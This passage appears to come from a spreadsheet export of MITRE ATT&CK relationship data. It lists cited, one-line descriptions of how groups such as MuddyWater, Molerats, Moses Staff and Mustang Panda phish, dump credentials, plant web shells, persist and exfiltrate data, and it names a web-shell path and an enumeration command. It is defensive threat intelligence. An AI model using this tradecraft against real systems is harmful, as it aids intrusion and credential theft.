    <t>[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious links included.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--0f29f072-1eb1-4711-8679-19580f16b351</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has used forged Microsoft code-signing certificates on malware.(Citation: FireEye Operation Molerats)</t>
  </si>
  <si>
    <t>relationship--361cbd71-b178-44d0-9802-78a310938bad</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--a06bd922-b887-4134-81cb-1e4180cf5a5a</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) decompresses ZIP files once on the victim machine.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--497aec05-cb34-424d-943f-4fdfbf2585b4</t>
  </si>
  <si>
    <t xml:space="preserve">[Molerats](https://attack.mitre.org/groups/G0021) used executables to download malicious files from different sources.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--2fd0b80f-d053-4679-a350-1bb45b32ab49</t>
  </si>
  <si>
    <t>13 May 2020</t>
  </si>
  <si>
    <t xml:space="preserve">[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with JS, on target machines.(Citation: Kaspersky MoleRATs April 2019)	</t>
  </si>
  <si>
    <t>relationship--cbba2f85-d5f4-4306-a219-5eea6c59dbb6</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</si>
  <si>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</si>
  <si>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relationship--e586e3c7-ed6b-4f6b-92e8-031f0acc84ef</t>
  </si>
  <si>
    <t xml:space="preserve">[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious links via email trick users into opening a RAR archive and running an executable.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--21ebcd72-cb89-4d26-82b7-4d17843034c5</t>
  </si>
  <si>
    <t xml:space="preserve">[Molerats](https://attack.mitre.org/groups/G0021) has used msiexec.exe to execute an MSI payload.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>relationship--0da9ee24-37ac-4568-b1fc-d784f05dfc97</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has delivered compressed executables within ZIP files to victims.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--383a50af-eeeb-40e5-b4df-8a1a9c5baa69</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) used PowerShell implants on target machines.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--b2562bd3-5f78-4bcb-a37b-cae2b415c629</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) actors obtained a list of active processes on the victim and sent them to C2 servers.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--6e757efa-8231-4674-a1ea-e234e2dfb838</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) saved malicious files within the AppData and Startup folders to maintain persistence.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--aa4038e3-451f-4ad7-acc7-5c971825967b</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has created scheduled tasks to persistently run VBScripts.(Citation: Unit42 Molerat Mar 2020)</t>
  </si>
  <si>
    <t>relationship--3f898155-f810-4d2c-8e30-34723d845ade</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious Microsoft Word and PDF attachments.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020)(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--5a9f2571-e611-4f7f-b0c9-6fc2d306b2f6</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious links included.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--7fd1b042-8543-46f7-90d5-631500f17e9e</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with VBScript, on target machines.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020)</t>
  </si>
  <si>
    <t>relationship--b5ba1f46-0dd0-49f7-9d24-3822153229ba</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used signed drivers from an open source tool called DiskCryptor to evade detection.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--8e0d4a0f-efad-4ee8-bbda-f708dca5ebe6</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used batch scripts that can disable the Windows firewall on specific remote machines.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--6d8718c4-9abe-41fc-b048-472da9d70b5c</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has exploited known vulnerabilities in public-facing infrastructure such as Microsoft Exchange Servers.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--cf1d394d-a767-40a8-be7a-87c17531dfdb</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has downloaded and installed web shells to following path &lt;code&gt;C:\inetpub\wwwroot\aspnet_client\system_web\IISpool.aspx&lt;/code&gt;.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--cdef12f4-7353-4edc-90d7-f6f7f7a13e7d</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has collected the administrator username from a compromised host.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--24892996-c220-4d25-92d8-7db597873090</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has built malware, such as [DCSrv](https://attack.mitre.org/software/S1033) and [PyDCrypt](https://attack.mitre.org/software/S1032), for targeting victims' machines.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--8b9d30d9-7546-4fc0-87cb-1e432fe788e8</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used obfuscated web shells in their operations.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--a56ece45-a76c-4b19-8999-6dde50b48409</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used batch scripts that can enable SMB on a compromised host.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--046310ee-386b-4ed6-a623-6436341b8b8c</t>
  </si>
  <si>
    <t xml:space="preserve">[Moses Staff](https://attack.mitre.org/groups/G1009) collected information about the infected host, including the machine names and OS architecture.(Citation: Checkpoint MosesStaff Nov 2021)
</t>
  </si>
  <si>
    <t>relationship--536e8b4c-af1b-44da-aba7-e46068ced103</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has collected the domain name of a compromised network.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--209d5669-2e7e-4621-905a-f22ba07f06d6</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used the commercial tool DiskCryptor.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--8019fbd7-b72e-42aa-8685-60e8138db932</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has dropped a web shell onto a compromised system.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--880a83f9-a07a-436d-8aa4-1afbe8b66d57</t>
  </si>
  <si>
    <t>[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has injected content into DNS, HTTP, and SMB replies to redirect specifically-targeted victims to a fake Windows Update page to download malware.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--fac1ed8a-a5a8-4b4f-a6ca-bc6a19d001a3</t>
  </si>
  <si>
    <t>[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has exploited CVE-2021-1732 to execute malware components with elevated rights.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--728302b6-f61c-40f1-9a78-926d785a3692</t>
  </si>
  <si>
    <t>[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used JavaScript to deliver malware hosted on HTML pages.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--396056dc-8657-418c-9c7a-4468878af204</t>
  </si>
  <si>
    <t>[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used plugins to execute PowerShell scripts.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--277532f0-8f01-4b9d-b59a-3c993f5e528d</t>
  </si>
  <si>
    <t>[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used a reverse proxy tool similar to the GitHub repository revsocks.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--6abb1f16-7e68-4b0d-a1ae-4001f5a7f87b</t>
  </si>
  <si>
    <t>[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used plugins to save captured screenshots to `.\AActdata\` on an SMB share.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--c51de2e2-e36c-4716-b77a-7b35496049a3</t>
  </si>
  <si>
    <t>[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used plugins to take screenshots on targeted systems.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--4deeafce-daf7-4dc8-a949-80eaf086ca0e</t>
  </si>
  <si>
    <t>[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used malware plugins packed with Themida.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--41d56dfa-e797-4bd1-826c-3e78d346f5ed</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>relationship--8cecace8-2820-4489-b3e8-baf4b9f33ff3</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used web services including OneHub to distribute remote access tools.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>relationship--e8ea86ae-0cdc-4521-a9da-357e53514115</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) uses various techniques to bypass UAC.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>relationship--80d612e4-8d4a-45f7-8c29-d44a1aae794c</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used CMSTP.exe and a malicious INF to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: FireEye MuddyWater Mar 2018)</t>
  </si>
  <si>
    <t>relationship--3dad318f-b446-49c6-a62b-f0596b63a9c5</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>relationship--fc857925-ff28-49f9-ba76-7ec2d29ba939</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</si>
  <si>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</si>
  <si>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relationship--5c2cd95f-9c3a-4893-9a5f-960cfed62572</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used the .NET csc.exe tool to compile executables from downloaded C# code.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>relationship--663d6fdf-6c99-4ef6-9a4e-bbc8bbe8591f</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--319dbc0e-5026-4796-bfd9-43ef3d30eb8d</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has run a tool that steals passwords saved in victim email.(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>relationship--ee05131d-83bd-4eb5-b6c1-0f6925045b95</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</si>
  <si>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</si>
  <si>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relationship--9dfb0ad2-5456-492a-bb74-a288ce8f7f7c</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has run tools including Browser64 to steal passwords saved in victim web browsers.(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--885cab64-2589-4917-95ab-4ae5a2b75cd3</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--0839d954-ce47-4972-bea2-f4d9a76141af</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) decoded base64-encoded PowerShell commands using a VBS file.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>relationship--58545f9a-d2cf-4466-bc7f-9cdbdce25d70</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) can disable the system's local proxy settings.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--3e93cca0-c97a-49b3-af3b-9598b00a27f5</t>
  </si>
  <si>
    <t>08 April 2021</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used &lt;code&gt;cmd.exe net user /domain&lt;/code&gt; to enumerate domain users.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--40527571-0b01-4568-b72b-568ad8b419ae</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can execute PowerShell scripts via DDE.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>relationship--5ac271fa-d3a7-40a6-8862-3eb73331ae99</t>
  </si>
  <si>
    <t xml:space="preserve">[MuddyWater](https://attack.mitre.org/groups/G0069) has specifically targeted government agency employees with spearphishing e-mails.(Citation: Anomali Static Kitten February 2021)	 </t>
  </si>
  <si>
    <t>relationship--2a292158-5cb0-4ae6-a2e4-5bb454e090b1</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used C2 infrastructure to receive exfiltrated data.(Citation: Reaqta MuddyWater November 2017)</t>
  </si>
  <si>
    <t>relationship--dfb4c7e9-e1af-4716-b658-9cfbadd706dc</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--f439858f-020c-4476-b032-42b3abdc0e19</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Office vulnerability CVE-2017-0199 for execution.(Citation: ClearSky MuddyWater June 2019)</t>
  </si>
  <si>
    <t>relationship--f5e6ce32-60e2-4a2c-8cc9-efb9d613a8e4</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Microsoft Netlogon vulnerability (CVE-2020-1472).(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--f53f17c6-b2ad-4201-8a26-ef53565a61af</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</si>
  <si>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</si>
  <si>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relationship--cc78f0a1-7f4f-491e-a636-910f09d0c5a1</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>relationship--7aab9015-1839-4672-9a9a-76f478c858a8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</si>
  <si>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</si>
  <si>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relationship--82d8c106-c216-4d3f-9028-5f0b975e6330</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used JavaScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: ClearSky MuddyWater Nov 2018)(Citation: FireEye MuddyWater Mar 2018)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--435c288d-1e10-4610-bf41-531390e5a650</t>
  </si>
  <si>
    <t>relationship--1eb79c3a-2cee-48ff-80b1-a5c3f571a3e8</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has performed credential dumping with [Mimikatz](https://attack.mitre.org/software/S0002) and procdump64.exe.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--beda360a-6477-48b9-b7d1-4643d02bc3c9</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has stored a decoy PDF file within a victim's `%temp%` folder.(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>relationship--6ecbd739-f0c0-4aff-858f-255e3afeee8f</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</si>
  <si>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</si>
  <si>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relationship--d06420fb-1c4d-4a4e-b18e-4c0750310606</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has distributed URLs in phishing e-mails that link to lure documents.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--b6fa5f7f-1055-4a9a-8372-d281fd6ca4af</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</si>
  <si>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</si>
  <si>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relationship--3e82234f-db7b-4a0f-8c0a-979b01381a6a</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used mshta.exe to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload and to pass a PowerShell one-liner for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>relationship--1923bc58-a830-457d-810f-27091e032f46</t>
  </si>
  <si>
    <t xml:space="preserve">[MuddyWater](https://attack.mitre.org/groups/G0069) has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.(Citation: Talos MuddyWater May 2019) </t>
  </si>
  <si>
    <t>relationship--a3a7d091-49bb-4fd1-9442-d02e83a48ea1</t>
  </si>
  <si>
    <t>05 June 2019</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used a Word Template, Normal.dotm, for persistence.(Citation: Reaqta MuddyWater November 2017)</t>
  </si>
  <si>
    <t>relationship--07af222c-dbd5-4ea4-b94b-a0fe8bdefcee</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</si>
  <si>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</si>
  <si>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relationship--e8a77e9f-594d-429a-9eb0-51502af84c14</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to obtain a list of running processes on the system.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)</t>
  </si>
  <si>
    <t>relationship--9f81120a-adde-47cc-95bc-cd8201eb0a11</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used developed tools in Python including [Out1](https://attack.mitre.org/software/S0594).(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--95dce028-9046-4bcf-a949-2a0bc40d5038</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</si>
  <si>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</si>
  <si>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relationship--55d44c4e-c864-4e6f-ac33-62f13cd08f0e</t>
  </si>
  <si>
    <t xml:space="preserve">[MuddyWater](https://attack.mitre.org/groups/G0069) has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.(Citation: Trend Micro Muddy Water March 2021)(Citation: Anomali Static Kitten February 2021) </t>
  </si>
  <si>
    <t>relationship--df1b67d2-8a37-4803-a05d-9bbdb0f30819</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>relationship--ea11624f-1025-46a9-820b-0b87866f534d</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used scheduled tasks to establish persistence.(Citation: Reaqta MuddyWater November 2017)</t>
  </si>
  <si>
    <t>relationship--c8f3916d-e020-42a8-afe0-25fe8498245a</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can capture screenshots of the victim’s machine.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>relationship--6f6b8a04-916e-4f33-8837-ff48e00e771b</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>relationship--6bed87bb-2cb9-48a8-a23d-31ed8285c61f</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used a PowerShell backdoor to check for Skype connectivity on the target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--77c3f6a1-f25c-4669-bdc1-0f358793dd34</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</si>
  <si>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</si>
  <si>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relationship--2305a634-b226-4da2-a766-bec5458f9447</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has sent targeted spearphishing e-mails with malicious links.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--02d478b7-c728-4b43-b599-84bd75c3546e</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used tools to encode C2 communications including Base64 encoding.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--a1fc4800-c670-4bc1-bc42-2b5fe66d0297</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has stored obfuscated JavaScript code in an image file named temp.jpg.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>relationship--b8e0c578-c249-4106-9568-3cbe0473b081</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used AES to encrypt C2 responses.(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t>relationship--846c52e8-41dc-4fe1-ab99-53d280d21748</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</si>
  <si>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</si>
  <si>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relationship--9c5c8dbe-ec34-46f9-b4af-0a6e73f00c89</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to collect the victim’s IP address and domain name.(Citation: Securelist MuddyWater Oct 2018)</t>
  </si>
  <si>
    <t>relationship--4ab6ada3-0129-4f34-ba29-b793c6d98fff</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used a PowerShell backdoor to check for Skype connections on the target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--99cfee83-7db8-44c1-8fd8-75bc1c67d17c</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim’s username.(Citation: Securelist MuddyWater Oct 2018)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--d1d496f1-fa91-404e-a93a-97670817717a</t>
  </si>
  <si>
    <t>MuddyWater has made use of legitimate tools ConnectWise and Remote Utilities to gain access to target environment.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>relationship--17c0d0d3-b57d-434d-9404-1e67414a4da5</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</si>
  <si>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</si>
  <si>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relationship--4a0ee05d-f020-4811-bba6-56d12c15e275</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--7700e443-2a26-43ba-9557-4c6f11bfbde1</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used file sharing services including OneHub to distribute tools.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--47987857-8c6b-40d2-a294-860b8a4dec58</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>relationship--3ab6b7bc-bb49-4fcd-83fc-abbec5912d41</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</si>
  <si>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</si>
  <si>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relationship--1b6f869f-951c-4323-816f-dbedbe3aac0a</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has encrypted documents with RC4 prior to exfiltration.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--7687477f-ea5e-4a3f-806d-e561f5c8adb4</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used RAR to create password-protected archives of collected documents prior to exfiltration.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--449b3473-a6cc-4934-8441-84325f70e126</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) used custom batch scripts to collect files automatically from a targeted system.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>relationship--c51dce73-f92b-4eaa-b00b-4466f3e3ae09</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used junk code within their DLL files to hinder analysis.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--d704a927-fe82-4e17-85e9-55009860bd13</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a legitimately signed executable to execute a malicious payload within a DLL file.(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 November 2020)</t>
  </si>
  <si>
    <t>relationship--ac77f5ac-4a6e-4c58-a596-5e9aa6f00ff7</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) have acquired C2 domains prior to operations.(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021)</t>
  </si>
  <si>
    <t>relationship--ac5c1601-ee79-4d9e-b702-bf1771ee02ef</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used an additional filename extension to hide the true file type.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)</t>
  </si>
  <si>
    <t>relationship--e90de84d-a394-4797-834a-12e5849b9e68</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has leveraged the legitimate email marketing service SMTP2Go for phishing campaigns.(Citation: Proofpoint TA416 Europe March 2022)</t>
  </si>
  <si>
    <t>relationship--3a3956aa-6756-4682-aa1b-c5199c0f3540</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has used a customized [PlugX](https://attack.mitre.org/software/S0013) variant which could exfiltrate documents from air-gapped networks.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--6f8d9c8d-750d-40c2-9722-c000b1efda13</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has exploited CVE-2017-0199 in Microsoft Word to execute code.(Citation: Crowdstrike MUSTANG PANDA June 2018)</t>
  </si>
  <si>
    <t>relationship--8b2f18e7-8c3c-4d43-a2f9-53f87512f3a2</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) will delete their tools and files, and kill processes after their objectives are reached.(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>relationship--77a75897-0325-472b-a7d2-2c5f1faf5d46</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--ab1b96ad-3ad8-4b16-b886-559f693496ff</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129)'s [PlugX](https://attack.mitre.org/software/S0013) variant has created a hidden folder on USB drives named &lt;code&gt;RECYCLE.BIN&lt;/code&gt; to store malicious executables and collected data.(Citation: Avira Mustang Panda January 2020)</t>
  </si>
  <si>
    <t>relationship--34b96e5d-1b2a-4ca5-89b5-7de398966bea</t>
  </si>
  <si>
    <t>[Mustang Panda](https://attack.mitre.org/groups/G0129) has downloaded additional executables following the initial infection stage.(Citation: Recorded Future REDDELTA July 2020)</t>
  </si>
  <si>
